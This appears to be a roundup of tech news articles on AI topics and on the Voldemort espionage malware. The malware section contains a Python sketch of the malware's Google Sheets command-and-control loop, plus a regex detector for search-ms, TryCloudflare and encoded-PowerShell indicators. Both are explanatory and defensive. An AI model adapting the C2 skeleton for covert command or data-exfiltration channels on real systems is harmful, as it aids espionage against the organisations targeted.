AI-Designed Drugs by DeepMind Expected to Enter Clinical Trials This Year

 

Isomorphic Labs, a Google DeepMind spinoff, is set to see its AI-designed drugs enter clinical trials this year, according to Nobel Prize-winning CEO Demis Hassabis.

“We’ll hopefully have some AI-designed drugs in clinical trials by the end of the year,” Hassabis shared during a panel at the World Economic Forum in Davos. “That’s the plan.”

The company aims to drastically reduce the drug discovery timeline from years to mere weeks or months by leveraging breakthroughs in artificial intelligence. Hassabis, along with DeepMind scientist John Jumper and US professor David Baker, was awarded the 2024 Nobel Prize in Chemistry for innovative work on predicting and designing protein structures.

While AI's ability to analyze vast data sets holds promise for speeding up drug development, a December report by Bloomberg Intelligence highlighted a cautious adoption of the technology by major pharmaceutical companies. The report, led by analyst Andrew Galler, noted that initial data for clinical candidates has been mixed.

Despite this, partnerships between tech firms and pharmaceutical companies are growing. In 2023, Isomorphic Labs entered into strategic research collaborations with Eli Lilly & Co. and Novartis AG.

Founded in 2021 to commercialize DeepMind’s AI for drug discovery, Isomorphic Labs builds on the success of AlphaFold, DeepMind’s revolutionary tool for predicting protein structures. Since its debut in 2018, AlphaFold has evolved through three iterations and can now model a wide range of molecular structures, including DNA and RNA, and predict their interactions.

Espionage Concerns Arise from Newly Discovered Voldemort Malware

 


In August 2024, Proofpoint researchers identified an unusual campaign delivering custom malware through a novel attack chain. The malware's authors appear to have named it "Voldemort," based on internal file names and strings. The attack chain combines tactics that are currently popular in the threat landscape with less common ones, such as using Google Sheets for command and control (C2).

Beyond its tactics, techniques, and procedures (TTPs), the campaign is notable for pairing lure themes that impersonate government agencies of various countries with odd file naming and passwords such as "test". Researchers initially suspected the activity might be a red-team exercise, but the volume of messages and analysis of the malware quickly pointed to a genuine threat actor.

The aggressive "Voldemort" campaign has targeted organizations all over the world, impersonating tax authorities in Europe, Asia, and the U.S. Since the malicious activity began on Aug. 5, Proofpoint has counted more than 20,000 phishing messages sent to dozens of organizations worldwide.

Voldemort is a custom backdoor written in C, designed to exfiltrate data and deploy additional malicious payloads. The attack chain abuses Google Sheets as its C2 communication channel and uses files invoking the Windows Search protocol (search-ms) to deliver the malware.

Once the victim runs the downloaded payload, a legitimate copy of Cisco WebEx software is used to sideload a malicious DLL, and it is that DLL which communicates with the C2 server.

Proofpoint assesses with moderate confidence that this is likely an advanced persistent threat (APT) actor gathering intelligence. Although Proofpoint is well practiced at identifying named threat actors, it does not yet have enough data to attribute the activity to a specific group with high certainty. Some aspects of the campaign, such as its broad targeting, are more often associated with cybercrime, but the malware does not appear to be financially motivated; espionage is the better fit.

Written in C, Voldemort was built to gather information, but it can also drop additional payloads on the target. Proofpoint found Cobalt Strike hosted on the actor's infrastructure, making it a likely candidate for one of those payloads. The hackers sharply increased their daily phishing volume from August 17, peaking at nearly 6,000 emails impersonating tax agencies, which the researchers described as high.

The impersonated agencies included the Internal Revenue Service (IRS) in the United States, HM Revenue & Customs in the United Kingdom, and the Direction Générale des Finances Publiques in France. The lures gained credibility from being written in the native language of each tax authority, and the emails, sent from what appeared to be compromised domains, spoofed the agencies' legitimate domain names to look more genuine.

The campaign's overall objective is not definitively known, though Proofpoint researchers say espionage is likely, given Voldemort's intelligence-gathering capabilities and its ability to deploy additional payloads. More than half of all targeted organizations fall into the insurance, aerospace, transportation, and education sectors.

The threat actor behind the campaign is unknown, but Proofpoint believes it is likely conducting cyber espionage. The phishing messages contain Google AMP Cache URLs that redirect to a landing page hosted on InfinityFree; later messages in the campaign linked to the landing page directly. Towards the bottom of the landing page is a button that says "Click to view the document", which, when clicked, checks the browser's User-Agent string.

When the User Agent contains "Windows," the browser is automatically redirected to a search-ms URI, which points to a TryCloudflare-tunneled URI ending in .search-ms. This redirection prompts the victim to open Windows Explorer, although the specific query responsible for this action remains hidden from the victim, leaving only a popup visible. Concurrently, an image is loaded from a URL ending in /stage1 on an IP address that is managed by the logging service pingb.in. This service enables the threat actor to record a successful redirect and collect additional browser and network information about the victim. 

A distinguishing feature of the Voldemort malware is its use of Google Sheets as a command and control (C2) server. The malware pings Google Sheets to retrieve new commands to execute on the compromised device and to serve as a repository for exfiltrated data. Each infected machine writes its data to specific cells within the Google Sheet, which are often designated by unique identifiers, such as UUIDs. This method ensures that data from different breached systems remains isolated, allowing for more efficient management. 

Voldemort interacts with Google Sheets using Google's API, relying on an embedded client ID, secret, and refresh token, all of which are stored in its encrypted configuration. This strategy offers malware a dependable and widely available C2 channel while minimizing the chances of its network communications being detected by security tools. Given that Google Sheets is commonly used in enterprise environments, blocking this service could be impractical, further reducing the likelihood of detection. 
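To make the mechanism concrete, here is a minimal sketch of how a client could drive that pattern through Google's documented Sheets REST API. Everything in it (spreadsheet ID, credentials, helper names, cell layout) is a hypothetical illustration, not the malware's actual code:

```python
# Minimal sketch of the C2 pattern described above, for illustration only.
# Every identifier here (spreadsheet ID, OAuth credentials, cell layout) is
# hypothetical -- not taken from the actual malware. The point is that these
# are ordinary, documented Google Sheets API calls, which is why the traffic
# blends into normal enterprise activity.
import uuid
import requests

TOKEN_URL = "https://oauth2.googleapis.com/token"
SHEET_API = "https://sheets.googleapis.com/v4/spreadsheets/<SPREADSHEET_ID>"

def access_token(client_id: str, client_secret: str, refresh_token: str) -> str:
    # Standard OAuth refresh-token grant -- the same flow legitimate apps use.
    resp = requests.post(TOKEN_URL, data={
        "client_id": client_id,
        "client_secret": client_secret,
        "refresh_token": refresh_token,
        "grant_type": "refresh_token",
    })
    return resp.json()["access_token"]

machine_id = str(uuid.uuid4())  # one sheet page per infected host, per Proofpoint
headers = {"Authorization": "Bearer " + access_token("<ID>", "<SECRET>", "<TOKEN>")}

# Poll a cell on this machine's page for a pending command...
cmd = requests.get(f"{SHEET_API}/values/'{machine_id}'!A1", headers=headers).json()

# ...and write results back to an adjacent cell for the operator to collect.
requests.put(f"{SHEET_API}/values/'{machine_id}'!B1",
             params={"valueInputOption": "RAW"},
             headers=headers,
             json={"values": [["<command output>"]]})
```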

In 2023, the Chinese advanced persistent threat (APT) group APT41 was observed using Google Sheets as a C2 server, employing the red-teaming GC2 toolkit to facilitate this activity. To defend against such campaigns, security firm Proofpoint recommends several measures: restricting access to external file-sharing services to trusted servers only, blocking connections to TryCloudflare when not actively required, and closely monitoring for suspicious PowerShell executions. These steps are advised to mitigate the risks posed by the Voldemort malware and similar threats.
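That advice translates naturally into log monitoring. Below is a rough, hypothetical sketch of what it could look like in practice, scanning exported process-creation events for the indicators described in this campaign; the file and field names are assumptions to adapt to your own environment:

```python
# A rough sketch of the kind of monitoring that advice implies: scanning
# exported process-creation events (e.g., Sysmon Event ID 1 or Windows 4688
# logs dumped to CSV) for indicators seen in this campaign. The file name and
# column names are assumptions -- adapt them to your own SIEM export format.
import csv
import re

SUSPICIOUS = [
    re.compile(r"search-ms:", re.I),          # Windows Search protocol abuse
    re.compile(r"trycloudflare\.com", re.I),  # ad-hoc TryCloudflare tunnels
    re.compile(r"powershell.+-enc", re.I),    # encoded PowerShell commands
]

with open("process_events.csv", newline="", encoding="utf-8") as f:
    for event in csv.DictReader(f):
        cmdline = event.get("CommandLine", "")
        for pattern in SUSPICIOUS:
            if pattern.search(cmdline):
                print(f"[!] matched {pattern.pattern!r}: {cmdline[:120]}")
```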

Insect Farmers Embrace AI to Drive Down Production Costs

 


The insect farming industry, once a niche pursuit, has rapidly gained traction as a practical and sustainable answer to severe worldwide challenges: food security, environmental degradation, and resource shortages. As demand for alternative protein sources rises, insect farming techniques that are both green and cost-effective are becoming increasingly important.

In response, forward-thinking insect farmers are turning to artificial intelligence (AI) to optimize their operations and reduce expenses. Insect farming is a form of animal husbandry that raises insects such as mealworms, crickets, and black soldier flies for human consumption, animal feed, or other specialized products.

Insect farming has several advantages over conventional livestock farming, including a higher feed conversion rate, lower greenhouse gas emissions, and smaller land and water requirements. Compared with soybean-based animal feed, insect-based feed can also cut emissions, and its carbon footprint is lower still when the larvae are fed natural food waste.

Full Circle Biotechnology is one company using artificial intelligence to optimise production and cut costs. Based in a small, enclosed facility just outside Bangkok, Full Circle raises some 20 million black soldier fly larvae to make sustainable feed for Thailand's shrimp and pig farms. In the dark, warm, humid conditions, the larvae feed on fruit and vegetable waste supplied by food and beverage manufacturers; once harvested, they are combined with probiotic bacteria and mushrooms, which give the feed a probiotic effect.

Collins believes insect-based feeds can reduce the South American deforestation associated with soybean-based feeds. Studies have shown that insect-based feeds can have a far smaller carbon footprint than soymeal; by the company's account, the footprint of Full Circle's feed is "100 times lower than that of soymeal."

That environmental benefit comes with a caveat: insect-based feed reliably cuts carbon only when the larvae are raised on natural food waste. According to one report, insect-based feed can actually produce more carbon than soybean feed if the insects are fed specially processed food sources.

Full Circle's feed also contains more than twice as much protein as soy feed, making it more filling and nutritious. The company currently supplies 49 farms across Thailand and employs 14 people.

The company faces a challenge, however: soybean-based feed is significantly cheaper than insect-based feed. To close that gap, Full Circle is turning to artificial intelligence to maximise production while driving down costs.

It is developing a machine learning system that examines all available historical and current data on its insect farming to identify, and then continuously fine-tune, the most efficient methods. The variables range from temperature and the amount of feed used to the optimum space the larvae need, tracking thousands of flies quickly and accurately, and whether to introduce new strains of flies or species of bacteria.
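As a rough illustration of the approach, the sketch below fits a model to synthetic batch records and then searches it for promising rearing conditions. The variables, ranges, and data are invented for the example and are not Full Circle's actual system:

```python
# Illustrative sketch only: a minimal version of the optimisation loop the
# article describes. Variable names, ranges, and the synthetic yield data are
# assumptions, not Full Circle's actual system.
import numpy as np
from sklearn.ensemble import RandomForestRegressor

rng = np.random.default_rng(0)

# Hypothetical historical records: temperature (C), daily feed (kg), and
# stocking density (larvae/cm^2) for past rearing batches.
X = rng.uniform([24, 5, 2], [36, 25, 12], size=(500, 3))

# Stand-in yield curve (kg of larvae per batch) with an interior optimum;
# real data would come from the farm's sensors and harvest logs.
temp, feed, density = X.T
y = (10 - 0.15 * (temp - 30) ** 2 + 0.4 * feed - 0.01 * feed ** 2
     - 0.2 * (density - 6) ** 2 + rng.normal(0, 0.5, 500))

model = RandomForestRegressor(n_estimators=200, random_state=0).fit(X, y)

# Grid-search the fitted model for promising operating conditions.
grid = np.array(np.meshgrid(
    np.linspace(24, 36, 25),   # temperature
    np.linspace(5, 25, 25),    # feed
    np.linspace(2, 12, 25),    # density
)).reshape(3, -1).T
best = grid[model.predict(grid).argmax()]
print(f"suggested settings: temp={best[0]:.1f}C, feed={best[1]:.1f}kg, "
      f"density={best[2]:.1f}/cm^2")
```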

AI is seen as an invaluable tool for speeding up trial and error, building a better understanding of how insects are best produced and harvested. Meanwhile, in Lithuania, Cogastro, a software provider for insect farm management, is working on an AI-based system of its own.

Cogastro currently provides data analysis software, but the AI upgrade will let the system learn from an insect farm's data and adjust conditions autonomously. Founder and CEO Mante Sidlauskaite plans to launch the AI commercially within the next three years.

Sidlauskaite cautions, however, against the proliferation of companies claiming to offer ready-made AI systems, stressing that accurate AI models take time and experience to refine. As she emphasises, the integration of AI into insect farming heralds a significant shift in the agricultural landscape. By leveraging AI, insect farmers stand to gain lower costs, greater efficiency, and faster progress towards a more sustainable and resilient food production system.

With demand for alternative protein sources on the rise, AI-driven insect farming is positioned to play a pivotal role in shaping the future of agriculture. Full Circle is developing its AI system in collaboration with Singapore-based AI specialist Simon Christofides. Collins acknowledges that black soldier fly larvae farming is young compared with traditional agriculture, and that there is much still to learn.

He expresses confidence in AI's ability to accelerate the learning curve by analyzing extensive data collected from various sensors. While AI optimization is deemed essential for production enhancement, Collins underscores the necessity of maintaining a hands-off approach in certain aspects of insect farming.

Where is AI Leading Content Creation?


Artificial Intelligence (AI) is reshaping the world of social media content creation, offering creators new possibilities and challenges. The fusion of art and technology is empowering creators by automating routine tasks, allowing them to channel their energy into more imaginative pursuits. AI-driven tools like Midjourney, ElevenLabs, Opus Clip, and Papercup are democratising content production, making it accessible and cost-effective for creators from diverse backgrounds.  

Automation is at the forefront of this revolution, freeing up time and resources for creators. These AI-powered tools streamline processes such as research, data analysis, and content production, enabling creators to produce high-quality content more efficiently. This democratisation of content creation fosters diversity and inclusivity, amplifying voices from various communities. 

Yet, as AI takes centre stage, questions arise about authenticity and originality. While AI-generated content can be visually striking, concerns linger about its soul and emotional depth compared to human-created content. Creators find themselves navigating this terrain, striving to maintain authenticity while leveraging AI-driven tools to enhance their craft. 

AI analytics are playing a pivotal role in content optimization. Platforms like YouTube utilise AI algorithms for A/B testing headlines, predicting virality, and real-time audience sentiment analysis. Creators, armed with these insights, refine their content strategies to tailor messages, ultimately maximising audience engagement. However, ethical considerations like algorithmic bias and data privacy need careful attention to ensure the responsible use of AI analytics in content creation. 
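To make the A/B-testing idea concrete, here is a minimal sketch of the statistics underneath such a test: a two-proportion z-test comparing the click-through rates of two headline variants. The click counts are invented for illustration; platforms run far more sophisticated versions of this at scale:

```python
# Illustrative sketch of the statistics behind headline A/B testing.
# The click counts below are made up; platforms like YouTube do this at
# scale with their own (unpublished) models.
from math import sqrt, erf

def ztest_two_proportions(clicks_a, views_a, clicks_b, views_b):
    """Two-sided z-test: did headline B's click-through rate differ from A's?"""
    p_a, p_b = clicks_a / views_a, clicks_b / views_b
    p = (clicks_a + clicks_b) / (views_a + views_b)       # pooled CTR
    se = sqrt(p * (1 - p) * (1 / views_a + 1 / views_b))  # standard error
    z = (p_b - p_a) / se
    p_value = 2 * (1 - 0.5 * (1 + erf(abs(z) / sqrt(2)))) # via normal CDF
    return p_a, p_b, z, p_value

# Hypothetical experiment: each headline shown to ~20,000 viewers.
print(ztest_two_proportions(clicks_a=640, views_a=20000,
                            clicks_b=742, views_b=19800))
```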

The rise of virtual influencers, like Lil Miquela and Shudu Gram, poses a unique challenge to traditional content creators. While these virtual entities amass millions of followers, they also threaten the livelihoods of human creators, particularly in influencer marketing campaigns. Human creators, by establishing genuine connections with their audience and upholding ethical standards, can distinguish themselves from virtual counterparts, maintaining trust and credibility. 

As AI continues its integration into content creation, ethical and societal concerns emerge. Issues such as algorithmic bias, data privacy, and intellectual property rights demand careful consideration for the responsible deployment of AI technologies. Upholding integrity and ethical standards in creative practices, alongside collaboration between creators, technologists, and policymakers, is crucial to navigating these challenges and fostering a sustainable content creation ecosystem. 

In this era of technological evolution, the impact of AI on social media content creation is undeniable. As we embrace the possibilities it offers, addressing ethical concerns and navigating through the intricacies of this digitisation is of utmost importance for creators and audiences alike.

 

Persistent Data Retention: Google and Gemini Concerns

 


Google has renamed its Bard chatbot Gemini, after the new artificial intelligence model that powers it, and says consumers can pay to upgrade its reasoning capabilities as it competes with Microsoft for subscribers. The new Gemini Advanced tier, which runs on the more powerful Ultra 1.0 model, costs US$19.99 ($30.81) a month, Alphabet said.

That is roughly double the US$9.99 ($15.40) a month Google charges for its 2TB storage plan, and subscribers get the same two terabytes of cloud storage, with access to Gemini through Gmail and the Google productivity suite to follow shortly.

The subscription, known as Google One AI Premium, is Google's most direct challenge yet to Microsoft and its partner OpenAI. It also means consumers now have several competing paid AI subscriptions to choose from.

In the past year, OpenAI launched its ChatGPT Plus subscription, which gives users early access to new AI models and features, while Microsoft recently launched a competing subscription that brings its AI into Word and Excel. Both cost US$20 a month in the United States.

According to Google, human annotators routinely read, tag, and process conversations with Gemini, though those conversations are disconnected from users' Google Accounts. Google has not said whether these annotators are in-house or outsourced, which matters for data security.

These conversations can be kept for as long as three years, along with "related data" such as the user's languages, devices, and location. Users do, however, have some control over how their Gemini data is retained.

Turning off Gemini Apps Activity in Google's My Activity dashboard (it is enabled by default) stops future conversations with Gemini from being saved to a Google Account for review, ending the three-year retention window for those conversations.

Individual prompts and conversations can also be deleted from the Gemini Apps Activity screen. However, Google says that even with Gemini Apps Activity turned off, Gemini conversations are kept on the user's Google Account for up to 72 hours to maintain the safety and security of Gemini apps and to help improve them.

Google encourages users not to enter confidential or sensitive information into conversations, meaning anything they would not want a reviewer to see or Google to use to improve its products, services, and machine learning technologies. On Thursday, Google's Gemini product lead, Jack Krawczyk, said Gemini Advanced was available in English in 150 countries worldwide.

Next week, Gemini's smartphone rollout will expand to Asia-Pacific, Latin America, and other regions around the world, with additional language support including Japanese and Korean. This follows the product's smartphone rollout in the US.

The free trial period lasts two months and is available to all users. Announcing the change, Krawczyk said Google's artificial intelligence approach had matured, bringing "the artist formerly known as Bard" into the "Gemini era." As GenAI tools proliferate, organizations are becoming increasingly wary of the privacy risks associated with them.

A Cisco survey conducted last year found that 63% of companies have restricted what kinds of data may be submitted to GenAI tools, while 27% have prohibited their use altogether. Another survey found that 45% of employees had submitted "problematic" data to such tools, including personal information and non-public files about their employers.

Several companies, including OpenAI, Microsoft, Amazon, and Google, now offer enterprise-grade GenAI products that do not retain customer data at all, whether for training models or any other purpose. Consumers, as is usually the case where corporate greed is concerned, are likely to get shorted.

The Rise of AI Restrictions: 25% of Firms Slam the Door on AI Magic

 


When ChatGPT was first released to the public, corporate titans from Apple to Verizon made headlines by banning the software at work shortly after it launched. A recent study confirms those companies are not anomalies.

More than 1 in 4 companies have banned the use of generative artificial intelligence tools at work at some point, according to a Cisco survey of 2,600 privacy and security professionals conducted last summer.

According to the survey, 63% of respondents limit what data employees can enter into these systems, and 61% restrict which generative AI tools employees may use within their organizations.

The findings come from the firm's annual Data Privacy Benchmark Study, which polled respondents across 12 countries.

According to Robert Waitman, director of Cisco's Privacy Center of Excellence, who wrote a blog post about the survey, over two-thirds of respondents worried that data entered into these tools could be disclosed to competitors or the public. Even so, 48% admitted to entering non-public company information into them, which could pose a problem.

Concerns about AI's use of personal data run deep, and 91% of organizations recognize they need to do more to reassure customers that their data is used only for intended and legitimate purposes in AI. That figure is essentially unchanged from last year, suggesting little progress has been made in building consumer trust.

Organizations' priorities differ from individuals' when it comes to building consumer trust. Consumers' top concerns are getting clear information about exactly how their data is being used and not having it sold to marketers. For the businesses surveyed, compliance with privacy laws was the top priority (25%), followed closely by avoiding data breaches (23%).

This suggests a greater focus on transparency would be beneficial, particularly in AI applications, where it can be difficult to understand how algorithms make their decisions. Over the past five years, privacy spending has more than doubled, benefits have risen, and returns have held steady.

This year, 95% of respondents said privacy's benefits outweigh its costs, with the average organization reporting a 1.6x return on its privacy investment. Additionally, 80% said privacy investments had produced higher customer loyalty and trust, a figure that rose to 92% among the most privacy-mature organizations.

Since last year, the largest organizations, those with 10,000 or more employees, have increased their privacy spending by around 7-8%. Smaller organizations invested less, however: businesses with 50-249 employees cut their average privacy investment by about a quarter.

The survey also found that 94% of respondents said their customers would not buy from them if their data were not properly protected. “Customers are looking for hard evidence that an organization can be trusted,” said Harvey Jang, Cisco Vice President and Chief Privacy Officer.

Privacy has become inextricably linked with customer trust and loyalty, and investing in it can help organizations deploy AI ethically and responsibly as the technology becomes more prevalent.

Microsoft is Rolling out an AI Powered Key

 


Prepare for a paradigm shift as Microsoft takes a giant leap forward with a game-changing announcement: the addition of an Artificial Intelligence (AI) key to its keyboards, the most substantial update to the Windows keyboard in 30 years.

This futuristic addition promises an interactive and seamless user experience, bringing cutting-edge technology to the tips of your fingers. Explore the next frontier of computing as Microsoft redefines the way we engage with our keyboards, setting a new standard for innovation in the digital age. The groundbreaking addition grants users seamless access to Copilot, Microsoft's dynamic AI tool designed to elevate your computing experience. 

At the forefront of AI advancements, Microsoft, a key investor in OpenAI, strategically integrates Copilot's capabilities into various products. Witness the evolution of AI as Microsoft weaves its intelligence into the fabric of everyday tools like Microsoft 365 and enhances search experiences through Bing. 

Not to be outdone, rival Apple has long embraced AI integration, evident in MacBooks featuring a dedicated Siri button on the Touch Bar. As the tech giants vie for user-friendly AI interfaces, Microsoft's AI key emerges as a pivotal player in redefining how we interact with technology.

Copilot, the star of Microsoft's AI arsenal, goes beyond the ordinary, assisting users in tasks ranging from efficient searches to crafting emails and even generating visually striking images. It's not just a tool; it's your personalised AI companion, simplifying tasks and enriching your digital journey. Welcome to the era where every keystroke opens doors to boundless possibilities. 

By pressing this key, users seamlessly engage with Copilot, enhancing their daily experiences with artificial intelligence. Similar to the impact of the Windows key introduced nearly 30 years ago, the Copilot key marks another significant milestone in our journey with Windows, serving as the gateway to the realm of AI on PCs. 

In the days leading up to and during CES, the Copilot key will debut on numerous Windows 11 PCs from our ecosystem partners. Expect its availability from later this month through Spring, including integration into upcoming Surface devices. 

This addition, which simplifies access to Copilot, has already made waves in Office 365 applications like Word, PowerPoint, and Teams, offering functionalities such as meeting summarization, email writing, and presentation creation. Bing, Microsoft's search engine, has also integrated Copilot. 

According to Prof John Tucker from Swansea University, the introduction of this key is a natural progression, showcasing Microsoft's commitment to enhancing user experience across various products. Despite Windows 11 users already having access to Copilot via the Windows key + C shortcut, the new dedicated key emphasises the feature's value.

Acknowledging the slow evolution of keyboards over the past 30 years, Prof Tucker notes that Microsoft's focus on this particular feature illustrates its potential to engage users across multiple products. Google, the dominant search engine, employs its own AI system called Bard, while Microsoft's Copilot is built on OpenAI's GPT-4 language model, introduced in 2023.

The UK's competition watchdog is examining Microsoft's ties with OpenAI, prompted by the recent boardroom upheaval at the AI firm that highlighted how tightly the two companies are connected. The investigation seeks to understand what this close association means for competition within the industry.

As we anticipate its showcase at CES, this innovative addition not only reflects Microsoft's commitment to user-friendly technology but also sparks curiosity about the evolving landscape of AI integration. Keep your eyes on the keyboard – the Copilot key signals a transformative era where AI becomes an everyday companion in our digital journey.


Google Eases Restrictions: Teens Navigate Bard with Guardrails

 


Google is opening up access to Bard, its chatbot based on artificial intelligence, to teens in most countries around the world, with some guardrails in place. The rollout begins Thursday, according to Tulsee Doshi, Head of Product for Responsible AI at Google.

Teens who meet the minimum age requirement to manage their own Google Account can access the chatbot in English, with more languages to come. The expanded launch includes a number of safety features and guardrails designed to keep teens away from harmful content.

According to a blog post by Google, teenagers can use the search giant's tool to find inspiration, discover new hobbies, and solve everyday problems. Teens can ask Bard about anything from important decisions, such as where to apply to college, to lighter matters, such as learning an entirely new sport.

Google also positions the platform as a valuable learning tool, letting teens dig deeper into topics, develop their understanding of complex concepts, and practice new skills in ways that work for them.

Bard has guardrails designed to keep unsafe content, such as material involving illegal substances or age-gated products, out of its responses to teens, and it has been trained to recognize topics that are inappropriate for them.

The first time a teen asks Bard a fact-based question, Google will automatically run its double-check feature, which looks for content across the web to substantiate Bard's answer.

Bard will also actively encourage teens to use double-check, to help them develop information literacy and critical thinking skills. Google plans to roll the feature out to all Bard users, in part to raise awareness that large language models (LLMs) can hallucinate.

A "tailored onboarding experience" will also be offered to teens which provides them with a link to Google's AI Literacy Guide, along with a video explaining how to use generative AI responsibly, and a description of how Bard Activity is used with the option to turn it on or off. In addition, Google has also announced that it will be bringing a math learning experience to Bard's campus, which will allow anyone, including teens, to type or upload a picture of a math equation. 

Rather than just providing the answer, Bard will explain how to solve the equation step by step.
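For example, given the equation 3x + 5 = 20, the kind of step-by-step explanation the feature aims to produce (a made-up illustration, not Bard's actual output) would run:

\[
3x + 5 = 20 \;\Rightarrow\; 3x = 20 - 5 = 15 \;\Rightarrow\; x = \frac{15}{3} = 5.
\]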

Several of the features launching alongside teen access are likely to be especially helpful to teens, but they are available to everyone.

Google has also been improving the quality of Search for homework help in recent years, and Bard can now create charts from data provided in a prompt. It is no surprise that Google is opening Bard to teens just as social platforms' AI chatbots for young users have landed to mixed reviews.

Snapchat's "My AI" chatbot, launched in February without appropriate age-gating features, drew controversy after it was found chatting with minors about topics such as covering up the smell of weed and setting the mood for sexual activity.

Bard is now available in over 230 countries and territories, including the United States, the United Kingdom, and Australia. Google first announced the tool in February, giving it a limited early-access launch in the US and UK, where an embarrassing factual error caused by hallucination marred its debut. Since then, Google has added a raft of new features to Bard as it competes with chatbots like OpenAI's ChatGPT and Microsoft's recently rebranded Bing Chat, now called Copilot.